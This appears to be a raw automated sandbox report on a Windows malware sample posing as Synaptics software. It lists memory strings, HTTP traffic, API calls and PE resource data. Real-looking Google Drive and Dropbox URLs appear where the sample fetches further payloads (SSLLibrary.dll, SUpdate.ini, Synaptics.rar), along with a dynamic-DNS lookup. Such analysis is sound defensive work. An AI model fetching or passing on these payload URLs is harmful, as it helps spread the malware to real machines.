                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~x
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp
                                String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp
                                String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: RCXDA77.tmp.9.dr
                                String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                                String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp
                                String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                                Source: RCXDA77.tmp.9.dr
                                String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                                String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                Source: RCXDA77.tmp.9.dr
                                String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                                String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp
                                String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dll
                                Source: RCXDA77.tmp.9.dr
                                String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                                String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                Source: unknown DNS traffic detected: queries for: docs.google.com
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00474D50 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,6_2_00474D50
                                Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
                                Source: global traffic HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 27 May 2022 02:38:15 GMT Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp" Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]} Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-4bAlBbOaiT_hTXvvmYwNRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vpJfeg6kjn4Ijj-MdmjgMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9ATWUqWplyjaZX-8YRpg4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8wRx_faYmVTA8D5WLtXo5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9R5mwl4rYkZg3c-4B7qtMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4qLAeArRAnTGw8wdmFdaFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nK_zVm8RpduIrJRUkFtKrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SCJceu0jJ5LJ5g8si9tx1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-sCDEfOABCSvIz84aGtWdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-oje0L9RWaQhTRD4wFQsMjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-7x-dDGPCK1jzWlmJAVXdXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: Synaptics.exe, 00000009.00000003.342497057.00000000054F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.comdeveloper.android.google.cndevelopers.android.google.cnsource.android.google.cn equals www.youtube.com (Youtube)
                                Source: unknown HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
                                Source: unknown HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0043C1FC GetKeyboardState, 6_2_0043C1FC
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 7_2_00405809
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004289FC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 6_2_004289FC
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00429040 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 12_2_00429040
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004601F0 6_2_004601F0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0046C7CC 6_2_0046C7CC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0048C7F4 6_2_0048C7F4
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0044EA40 6_2_0044EA40
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00496E18 6_2_00496E18
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0046B1E4 6_2_0046B1E4
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045FCC8 6_2_0045FCC8
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00453DA4 6_2_00453DA4
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00406D5F 7_2_00406D5F
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_687E1BFF 7_2_687E1BFF
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_004601F0 9_2_004601F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0046C7CC 9_2_0046C7CC
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0048C7F4 9_2_0048C7F4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0044EA40 9_2_0044EA40
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00496E18 9_2_00496E18
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0046B1E4 9_2_0046B1E4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045FCC8 9_2_0045FCC8
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00453DA4 9_2_00453DA4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_004601F0 12_2_004601F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0046C7CC 12_2_0046C7CC
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0048C7F4 12_2_0048C7F4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0044EA40 12_2_0044EA40
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00496E18 12_2_00496E18
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0046B1E4 12_2_0046B1E4
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045FCC8 12_2_0045FCC8
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00453DA4 12_2_00453DA4
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Process Stats: CPU usage > 98%
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uniformerede.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ._cache_uniformerede.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Synaptics.exe.6.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXCD96.tmp.6.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: YC9w8Aif.exe.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXDA77.tmp.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXF979.tmp.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ~$cache1.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Section loaded: starttiledata.dll
